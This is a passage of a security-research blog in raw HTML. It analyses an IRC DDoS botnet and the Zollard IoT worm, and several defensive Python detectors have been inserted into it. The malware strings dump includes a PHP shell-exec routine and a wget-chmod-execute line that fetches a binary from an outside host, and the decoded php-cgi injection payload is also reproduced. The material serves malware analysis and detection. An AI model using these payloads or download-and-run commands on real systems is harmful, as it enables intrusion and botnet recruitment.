<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;">The "seed" script also instructed our server to download "stats.php". This was also a tar file, which when expanded, created a hidden directory named ".d" containing the following files:</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrXsTQkSBr3TTa6kek2M_whmHb2mLcZb_tni1RaRNOELOoStCAKfqv5cJVgXE1OPBbJjCEgdhvGQR_aZOPoF9CrTzbYcJhZxBvVjZp6q1NUl-mv_vhyYs8nHzDYuh-UmWYsO_lvafkfQ/s1600/d.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrXsTQkSBr3TTa6kek2M_whmHb2mLcZb_tni1RaRNOELOoStCAKfqv5cJVgXE1OPBbJjCEgdhvGQR_aZOPoF9CrTzbYcJhZxBvVjZp6q1NUl-mv_vhyYs8nHzDYuh-UmWYsO_lvafkfQ/s1600/d.jpg" height="246" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit;">Contents of hidden 'd' subdirectory</span></td></tr>
</tbody></table>
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 19.9999942779541px;">The subdirectory "c" contained source files for port flooding routines.</span></div>
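A content-based check for the disguised archives in this chain ("seed.jpg", "index.htm" and "stats.php" are all tarballs with misleading names), as an added example that is not code from the post: it sniffs magic bytes instead of trusting the extension, lists the archive members and flags executable scripts and hidden directories such as ".d". The sample archive is constructed in memory as a stand-in for the real seed.jpg; only the member names mirror the post.

```python
"""Content-based check for the disguised archives in this delivery chain.

Added example, not code from the DeepEnd Research post. seed.jpg, index.htm
and stats.php are all gzip tarballs with misleading names, so an egress proxy
or host agent that trusts the extension or Content-Type sees an image and two
web pages. Sniffing magic bytes and listing the archive members does not.
"""
import io
import tarfile

# (offset, magic, type). The "ustar" tag of a plain tar sits at offset 257.
MAGICS = [
    (0, b"\x1f\x8b", "gzip"),
    (0, b"\xff\xd8\xff", "jpeg"),
    (0, b"\x7fELF", "elf"),
    (257, b"ustar", "tar"),
]

# What the extension claims the file is.
EXPECTED = {".jpg": "jpeg", ".jpeg": "jpeg", ".htm": "text", ".html": "text",
            ".php": "text", ".txt": "text"}


def sniff(data):
    """Classify by leading bytes; fall back to 'text' for printable ASCII."""
    for offset, magic, kind in MAGICS:
        if data[offset:offset + len(magic)] == magic:
            return kind
    head = data[:512]
    if head and all(32 <= b < 127 or b in (9, 10, 13) for b in head):
        return "text"
    return "unknown"


def tar_members(data):
    """List members of a (gzip or plain) tar: name, exec bit, shebang line."""
    members = []
    try:
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for m in tf:
                shebang = ""
                if m.isfile():
                    f = tf.extractfile(m)
                    first = f.read(80).split(b"\n", 1)[0] if f else b""
                    if first.startswith(b"#!"):
                        shebang = first.decode("ascii", "replace")
                members.append({"name": m.name,
                                "executable": bool(m.mode & 0o111),
                                "shebang": shebang})
    except tarfile.TarError:
        return []
    return members


def _hidden(path):
    """True if any path component is a dot-directory or dot-file (e.g. '.d/')."""
    return any(p.startswith(".") for p in path.split("/") if p not in ("", "."))


def analyse_download(name, data):
    """Compare what the name claims with what the bytes are; inspect archives."""
    dot = name.rfind(".")
    ext = name[dot:].lower() if dot >= 0 else ""
    kind = sniff(data)
    members = tar_members(data) if kind in ("gzip", "tar") else []
    suspicious = [m["name"] for m in members
                  if m["shebang"] or m["executable"] or _hidden(m["name"])]
    return {"name": name, "sniffed": kind,
            "mismatch": EXPECTED.get(ext, kind) != kind,
            "members": members, "suspicious": suspicious}


def build_sample():
    """Constructed stand-in for seed.jpg: a gzip tarball holding an executable
    shell script plus a file under a hidden '.d' directory, as in the post."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, body in (("seed", b"#!/bin/bash\necho sample stage\n"),
                           (".d/autorun", b"#!/bin/sh\necho sample stage 2\n")):
            info = tarfile.TarInfo(path)
            info.size = len(body)
            info.mode = 0o755
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


if __name__ == "__main__":
    report = analyse_download("seed.jpg", build_sample())
    print(report["name"], "claims jpeg but is", report["sniffed"])
    for m in report["members"]:
        print(" ", m["name"], "exec" if m["executable"] else "", m["shebang"])
```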
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZtthxBtVG-aqMjre59k9b35fmTokQ1txiC08IezAUxwco_M5M2KPwk2xWT02EINfGksILX8BxHPK0gc0-t-dmkMT46C8Kf0OixBLeOZk7wRAhYMgKLtn7iE8hZnDyBvjNz7JnVn-xaLU/s1600/c.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZtthxBtVG-aqMjre59k9b35fmTokQ1txiC08IezAUxwco_M5M2KPwk2xWT02EINfGksILX8BxHPK0gc0-t-dmkMT46C8Kf0OixBLeOZk7wRAhYMgKLtn7iE8hZnDyBvjNz7JnVn-xaLU/s1600/c.jpg" height="104" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit;">Contents of 'c' subdirectory</span></td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeaKR-cYRnX2OiU9c7tP8Y9uGOb2Utqcjn1NFSDBddmwQG3zjzHS9pLhZBe77z2ndKgBRO1ptyYsDxtRkdI5lgnvEyQ05mZ1QIV3FOH-2c8gvB1vQKzt6MBVLaKukj_lZU3ECwA3PoYM/s1600/flood_src.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeaKR-cYRnX2OiU9c7tP8Y9uGOb2Utqcjn1NFSDBddmwQG3zjzHS9pLhZBe77z2ndKgBRO1ptyYsDxtRkdI5lgnvEyQ05mZ1QIV3FOH-2c8gvB1vQKzt6MBVLaKukj_lZU3ECwA3PoYM/s1600/flood_src.jpg" height="400" width="333" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Section of "Slashing SirVic's" flooding source code.</td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">Two other files included in the "stats.php" tarball were of particular interest. They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports. At this point it is not clear what these lists represent; however, "bang.txt" appears to contain many non-U.S. addresses, notably weighted toward Romania, while "shiet.txt" contains a wide variety of IP addresses representing many kinds of organizations, corporations, universities, and service providers.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">After observing several DDoS attacks initiated by this infrastructure, we did not note a correlation between these lists and any attack victims. Nor have we yet observed any correlation between these lists and the compromised hosts initiating DDoS attack traffic.</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">The contents of "bang.txt", broken out by ASN and Network name can </span>be viewed from here: <a href="https://files.sempersecurus.org/dumps/bang_by_asn.txt" target="_blank">Link to "bang.txt"</a></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here: </span><span style="font-family: inherit;"> </span><a href="https://files.sempersecurus.org/dumps/shiet_by_asn.txt" style="font-family: inherit;" target="_blank">Link to "shiet.txt"</a></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;">Soon after the scripts were downloaded, our server joined the IRC C2 server at antiq.scifi.ro (195.182.159.51).</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbcqwX-bhkcc5kbbaip7Q4Ejp4LOfE3oDIfHv6uEabvYzGOJbsiPezGecChgtV3VtAWFUdSOgiz1IxxYrIe-pbRjwCLWpUzwuPO2iiFhS4lHPsGAlzM74fFuSFNZYdAF_lD3X-NTiE2dY/s1600/irc_join.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbcqwX-bhkcc5kbbaip7Q4Ejp4LOfE3oDIfHv6uEabvYzGOJbsiPezGecChgtV3VtAWFUdSOgiz1IxxYrIe-pbRjwCLWpUzwuPO2iiFhS4lHPsGAlzM74fFuSFNZYdAF_lD3X-NTiE2dY/s1600/irc_join.jpg" height="394" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bot joining C2 on <span style="font-size: small; text-align: left;">antiq.scifi.ro</span></td></tr>
</tbody></table>
<div style="border: 0px; margin: 0px; padding: 0px;">
Not long after that, a command initiating a flood attack against 70.39.96.225 arrived, and the compromised host began sending fragmented UDP packets to the victim.</div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWwFGPUgPCb25Qyw3OSTwX9Pmb4JYx6EuKhFYnD1MNDuSsziyY6JAv9CDQfxdd5ZRV39YpGrlc9hUf6dVNKifGiqqcJSBm6BcXdc-Ii7m35YN7ODpgIDzKleQtS6k78FQ6y1Fdr8K55w/s1600/ddos_pid.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWwFGPUgPCb25Qyw3OSTwX9Pmb4JYx6EuKhFYnD1MNDuSsziyY6JAv9CDQfxdd5ZRV39YpGrlc9hUf6dVNKifGiqqcJSBm6BcXdc-Ii7m35YN7ODpgIDzKleQtS6k78FQ6y1Fdr8K55w/s1600/ddos_pid.jpg" height="76" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bot being instructed to begin UDP flood to victim</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNw1-7iDrL5W5I5WpIdAxIsuhMNCmNxXiMOX_d7IKR0gC1r-rXnO0WTL3kkcgim84MaU1Yk2Ge6P-yz0I9gKEBHmpKtacLlfkp2QtXbFqccdLXhsxPGOyjkQApJOme_uMnJtg9SC-nfkE/s1600/ddos_udp.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNw1-7iDrL5W5I5WpIdAxIsuhMNCmNxXiMOX_d7IKR0gC1r-rXnO0WTL3kkcgim84MaU1Yk2Ge6P-yz0I9gKEBHmpKtacLlfkp2QtXbFqccdLXhsxPGOyjkQApJOme_uMnJtg9SC-nfkE/s1600/ddos_udp.jpg" height="482" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Packet capture of UDP flood</td></tr>
</tbody></table>
We have observed this botnet to be very active, targeting a wide variety of victims. While IRC botnets have been around for many years, their seeding and attack mechanisms continue to evolve.<br />
<br />
Unpatched CMS installations, weak SSH passwords, and vulnerable PHP deployments remain a major weak spot in Internet-facing servers. It is safe to say that if web site administrators do not run a regular, stringent patch management program, it is a matter of 'when', not 'if', they will be compromised.<br />
<br />
<br />
<div style="border: 0px; margin: 0px; padding: 0px;">
<br /></div>
</div>
</div>
</div>
</div>
</div>
Andre M. DiMino (http://www.blogger.com/profile/07255414624107506662)

Hey Zollard, leave my Internet of Things alone! (2013-12-03)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts. So <a href="http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices" target="_blank">Symantec's recent report</a> about Linux.Darlloz targeting "The Internet of Things" was of particular interest.<br />
<br />
Recently I noted an inbound PHP exploit attempt from <b><span style="color: yellow;">78.39.232.113</span> - Telecommunication Company of Kordestan - Iran</b><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2M6CkksMkJ9fWCmxFrmfSuq13YixeIauP1Wbe7lrBVinNyK0xDPzeYXTApCg4_N6DSMZlBiETbubhMZemFmidB50H1OHW66zQ9GKKxSChru5hebfrXP_b1C0NALUyy4lLUOV8rmpsKFA/s1600/exploit.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2M6CkksMkJ9fWCmxFrmfSuq13YixeIauP1Wbe7lrBVinNyK0xDPzeYXTApCg4_N6DSMZlBiETbubhMZemFmidB50H1OHW66zQ9GKKxSChru5hebfrXP_b1C0NALUyy4lLUOV8rmpsKFA/s400/exploit.png" width="292" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PHP exploit attempt from 78.39.232.113</td></tr>
</tbody></table>
The decoded POST is:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n</span><br />
<br />
Note the <b>User-Agent: Zollard</b> and the reference to the files that will be fetched and executed upon successful compromise. The files indicate several architectures: arm, ppc, mips, mipsel, and x86.<br />
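The decoded request above can be recognised in web-server logs without running anything. The following Python is an added example for this post, not the author's code or the malware's; it assumes a constructed one-request-per-line log layout (method, target, user agent) rather than any real server's format, and re-decodes the percent-encoded `-d` switches before matching them.

```python
"""Added example for this post (not the author's or Zollard's code): flag
php-cgi argument-injection requests like the decoded POST above.

Assumption: the log is one request per line as "METHOD PATH?QUERY USER-AGENT";
real deployments would parse their server's actual access-log format instead.
"""
import re
from urllib.parse import unquote_plus

# php.ini directives that, pushed through php-cgi's "-d" switch, let the
# request body be executed as PHP. None of them belongs in a URL.
DANGEROUS_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "safe_mode",
    "suhosin.simulation", "disable_functions", "open_basedir",
    "cgi.force_redirect", "cgi.redirect_status_env",
}

# CGI handler paths that appear in the malware's strings dumps.
CGI_TARGETS = ("/cgi-bin/php", "/cgi-bin/php5", "/cgi-bin/php-cgi",
               "/cgi-bin/php.cgi", "/cgi-bin/php4")

_D_SWITCH = re.compile(r"(?:^|\s)-d\s+([A-Za-z0-9_.]+)")


def decode_query(raw):
    """Percent-decode until stable (max 3 rounds) so that obfuscated bytes such
    as %6Fn -> on and %2Esimulation -> .simulation are undone before matching."""
    current = raw
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_directives(query):
    """Return the sorted set of directive names passed via -d in the query."""
    decoded = decode_query(query)
    return sorted({m.group(1).lower() for m in _D_SWITCH.finditer(decoded)})


def classify_request(path, query, user_agent):
    """Return the reasons a request looks like a php-cgi injection attempt.
    An empty list means nothing suspicious was found."""
    reasons = []
    decoded = decode_query(query)
    hits = [d for d in find_directives(query) if d in DANGEROUS_DIRECTIVES]
    if hits:
        reasons.append("php-cgi -d directives: " + ",".join(hits))
    if "php://input" in decoded.lower():
        reasons.append("auto_prepend_file pointed at php://input")
    if path in CGI_TARGETS and decoded.lstrip().startswith("-"):
        reasons.append("query string is a switch list on " + path)
    if user_agent == "Zollard":
        reasons.append("User-Agent Zollard")
    return reasons


def scan_log(text):
    """Parse the constructed log layout and return [(line_no, reasons)]."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        _method, target, user_agent = line.split(" ", 2)
        path, _, query = target.partition("?")
        reasons = classify_request(path, query, user_agent)
        if reasons:
            findings.append((n, reasons))
    return findings


# Constructed sample: the first line carries the same obfuscated switches as the
# decoded POST quoted above; the second is benign; the third passes a harmless
# directive to a CGI handler and is flagged only for the switch-list shape.
SAMPLE_LOG = (
    "POST /cgi-bin/php?-d+allow_url_include%3D%6Fn+-d+safe_mode%3Doff"
    "+-d+suhosin%2Esimulation%3Don+-d+disable_fu%6Ections%3D%22%22"
    "+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp:%2F%2Finput"
    "+-d+cgi.force_redirec%74%3D0+-d+cgi.redirect_status_env%3D0+-n Zollard\n"
    "GET /index.php?page=about Mozilla/5.0\n"
    "GET /cgi-bin/php-cgi?-d+display_errors%3D1 Mozilla/5.0\n"
)

if __name__ == "__main__":
    for line_no, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: " + "; ".join(reasons))
```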
<br />
All files were fetched, and the x86 file was sandboxed on a Linux VM. Immediately, the VM began incrementally scanning 117.201.0.0/18 for an open destination port 58455. The Linux malware also opened a listener on my VM's port 58455.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUxUXmYjx9GvNFt5Hnmx1j7aFWNPvN70y8v1mZ0062uMbz6kmP2D_u6ZQAzyRMrrsTIpo9JDmXdBURxiP6IrwK_XIXbUpuhm3P0_qBefHYD67JWupkAMuy5b54J-ZK43YWe1yO7av_DFs/s1600/netstat.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUxUXmYjx9GvNFt5Hnmx1j7aFWNPvN70y8v1mZ0062uMbz6kmP2D_u6ZQAzyRMrrsTIpo9JDmXdBURxiP6IrwK_XIXbUpuhm3P0_qBefHYD67JWupkAMuy5b54J-ZK43YWe1yO7av_DFs/s640/netstat.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Compromised host listening on port 58455</td></tr>
</tbody></table>
<br />
Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies, including 0x010005, 0x01010006, or 0x01020006.<br />
<br />
Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58455. Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".<br />
Weak or non-existent passwords allow for a successful Telnet login; examples are shown below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_xlxF5hdz2ZTCKB7OyXaPQyeJallgbx7Uv_aPB5nSriWRqK_-1FoprfbDvECI3XjQsiJCCweEMR2leIwrnCmL7uWElAx60BT9S0fgd3FT5qAjkIpqKsiVULgCnJAipCOco79orw9uF8/s1600/telnet_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_xlxF5hdz2ZTCKB7OyXaPQyeJallgbx7Uv_aPB5nSriWRqK_-1FoprfbDvECI3XjQsiJCCweEMR2leIwrnCmL7uWElAx60BT9S0fgd3FT5qAjkIpqKsiVULgCnJAipCOco79orw9uF8/s400/telnet_2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of Telnet session to a BusyBox device</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-DVVGL88QKGz_iYL4RUKxulL2YZdq_X9NV1ZVfbVC-kYzKwMcFXK1o7ocG8UFlLF7rTQjHJntCzyAVoB32T2_Qzf7HEVtq6_RfBXbRNttRKawhHt1AqW9d2MQ1QcbE9LBdc1wg4geaDE/s1600/telnet_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-DVVGL88QKGz_iYL4RUKxulL2YZdq_X9NV1ZVfbVC-kYzKwMcFXK1o7ocG8UFlLF7rTQjHJntCzyAVoB32T2_Qzf7HEVtq6_RfBXbRNttRKawhHt1AqW9d2MQ1QcbE9LBdc1wg4geaDE/s400/telnet_1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of Telnet session to ARM architecture device</td></tr>
</tbody></table>
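The peer-discovery handshake described above (probe on port 58455, one of the quoted replies, then a Telnet attempt) can be spotted from the network side. This Python is an added example, not part of the original post; it assumes flow records as `(src_ip, src_port, dst_ip, dst_port, payload)` tuples and uses RFC 5737 documentation addresses for its constructed sample, while the probe and reply values are exactly those quoted in the post.

```python
"""Added example for this post (not the author's or the malware's code):
recognise the port-58455 peer-discovery handshake described above in flow
records and summarise each scanning host's behaviour.

Assumptions: each flow is a tuple (src_ip, src_port, dst_ip, dst_port, payload)
as a sensor might emit; the sample addresses are RFC 5737 documentation ranges.
The probe and reply values are the ones quoted in the post, kept as hex strings.
"""
from collections import defaultdict
import ipaddress

PEER_PORT = 58455
PROBE_HEX = "00020015"                                   # sent by the scanning host
KNOWN_REPLIES_HEX = ("010005", "01010006", "01020006")   # answers the author observed


def looks_like_probe(dst_port, payload):
    """True for the initial 0x00020015 probe sent to the peer port."""
    return dst_port == PEER_PORT and payload.hex().startswith(PROBE_HEX)


def looks_like_reply(src_port, payload):
    """True when a host answers from the peer port with one of the quoted replies."""
    hexed = payload.hex()
    return src_port == PEER_PORT and any(hexed.startswith(r) for r in KNOWN_REPLIES_HEX)


def is_sequential(addrs):
    """True when the probed addresses form an unbroken ascending run of at
    least three, the incremental sweep pattern the sandboxed sample showed."""
    nums = sorted(int(ipaddress.ip_address(a)) for a in addrs)
    return len(nums) >= 3 and all(b - a == 1 for a, b in zip(nums, nums[1:]))


def analyze_flows(flows):
    """Return {scanner_ip: summary} for every host that sent the probe.

    A handshake counts only when the reply comes from a host that scanner
    actually probed, and a telnet follow-up only after a completed handshake,
    mirroring the order of events described in the post."""
    probes = defaultdict(set)      # scanner -> hosts it probed on 58455
    handshakes = defaultdict(set)  # scanner -> hosts that sent a known reply
    telnet = defaultdict(set)      # scanner -> hosts it then contacted on tcp/23
    for src, sport, dst, dport, payload in flows:
        if looks_like_probe(dport, payload):
            probes[src].add(dst)
        elif looks_like_reply(sport, payload) and src in probes.get(dst, ()):
            handshakes[dst].add(src)
        elif dport == 23 and dst in handshakes.get(src, ()):
            telnet[src].add(dst)
    return {
        scanner: {
            "probed": len(targets),
            "answered": len(handshakes.get(scanner, ())),
            "telnet_followups": len(telnet.get(scanner, ())),
            "sequential_sweep": is_sequential(targets),
        }
        for scanner, targets in probes.items()
    }


# Constructed sample: one host sweeps four consecutive addresses, two of them
# answer with quoted replies, and one is then contacted on telnet. The last two
# flows are benign traffic and an unrelated packet to port 58455.
SAMPLE_FLOWS = [
    ("192.0.2.10", 40001, "198.51.100.1", 58455, bytes.fromhex("00020015")),
    ("192.0.2.10", 40002, "198.51.100.2", 58455, bytes.fromhex("00020015")),
    ("198.51.100.2", 58455, "192.0.2.10", 40002, bytes.fromhex("01010006")),
    ("192.0.2.10", 40003, "198.51.100.3", 58455, bytes.fromhex("00020015")),
    ("198.51.100.3", 58455, "192.0.2.10", 40003, bytes.fromhex("010005")),
    ("192.0.2.10", 40004, "198.51.100.4", 58455, bytes.fromhex("00020015")),
    ("192.0.2.10", 40005, "198.51.100.2", 23, b"root\r\n"),
    ("192.0.2.20", 50000, "198.51.100.50", 80, b"GET / HTTP/1.1\r\n"),
    ("192.0.2.30", 50001, "198.51.100.7", 58455, b"hello"),
]

if __name__ == "__main__":
    for scanner, summary in analyze_flows(SAMPLE_FLOWS).items():
        print(scanner, summary)
```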
<br />
As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched. You may find it of interest to see a strings dump of each of the files:<br />
<br />
<div style="text-align: left;">
<br /></div>
<table border="1" style="text-align: left;"><tbody>
<tr> <td><div style="background-color: #eff8fb; color: black; height: 400px; overflow: scroll; scrollbar-base-color: #0489B1; width: 400px;">
#EgvT2<br />
@ #!<br />
!1C "<br />
V! 0<br />
/proc/self/exe<br />
nodes<br />
POST <br />
Host: <br />
User-Agent: Zollard<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: <br />
Connection: close<br />
$disablefunc = @ini_get("disable_functions");<br />
if (!empty($disablefunc))<br />
$disablefunc = str_replace(" ","",$disablefunc);<br />
$disablefunc = explode(",",$disablefunc);<br />
function myshellexec($cmd)<br />
global $disablefunc;<br />
$result = "";<br />
if (!empty($cmd))<br />
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}<br />
elseif (($result = `$cmd`) !== FALSE) {}<br />
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}<br />
elseif (is_resource($fp = popen($cmd,"r")))<br />
$result = "";<br />
while(!feof($fp)) {$result .= fread($fp,1024);}<br />
pclose($fp);<br />
return $result;<br />
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");<br />
myshellexec("chmod +x /tmp/x86");<br />
myshellexec("/tmp/x86");<br />
HTTP/1.1 200 OK<br />
httpd<br />
/bin/sh<br />
/proc<br />
/proc/<br />
/stat<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko<br />
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko<br />
iptables -D INPUT -p tcp --dport 23 -j DROP<br />
iptables -A INPUT -p tcp --dport 23 -j DROP<br />
telnetd<br />
/var/run/.lightpid<br />
/var/run/.aidrapid<br />
/var/run/lightpid<br />
/var/run/.lightscan<br />
/var/run/lightscan<br />
/var/run/mipsel<br />
/var/run/mips<br />
/var/run/sh<br />
/var/run/arm<br />
/var/run/ppc<br />
/var/run/m<br />
/var/run/mi<br />
/var/run/s<br />
/var/run/a<br />
/var/run/p<br />
/var/run/msx<br />
/var/run/mx<br />
/var/run/sx<br />
/var/run/ax<br />
/var/run/px<br />
/var/run/32<br />
/var/run/sel<br />
/var/run/pid<br />
/var/run/gcc<br />
/var/run/dev<br />
/var/run/psx<br />
/var/run/mpl<br />
/var/run/mps<br />
/var/run/sph<br />
/var/run/arml<br />
/var/run/mips.l<br />
/var/run/mipsell<br />
/var/run/ppcl<br />
/var/run/shl<br />
/bin/pp<br />
/bin/mi<br />
/bin/mii<br />
/var/tmp/dreams.install.sh<br />
/var/tmp/ep2.ppc<br />
/var/0.run<br />
/var/1.run<br />
/var/idhash<br />
/var/response<br />
/var/challenge<br />
/var/b.arm_v5t<br />
/var/b.arm_v6k<br />
/var/f.arm_v5t<br />
/var/f-t2.arm_v6k<br />
/var/f-t2.mips<br />
/var/f-t2.mipsel<br />
/var/sp.arm_v5t<br />
/var/sp.arm_v6k<br />
/var/t2.arm_v6k<br />
/var/readme<br />
/var/b/b3.arm_v5t<br />
/var/b/b3.arm_v6k<br />
/var/b/b3.mips<br />
/var/b/b3.ramips<br />
/var/b/b3.rtl<br />
/var/b/readme<br />
/var/b/0.run<br />
/var/b/1.run<br />
/var/b/idhash<br />
/dav/0.run<br />
/dav/1.run<br />
/dav/b3.arm_v5t<br />
/dav/b3.arm_v6k<br />
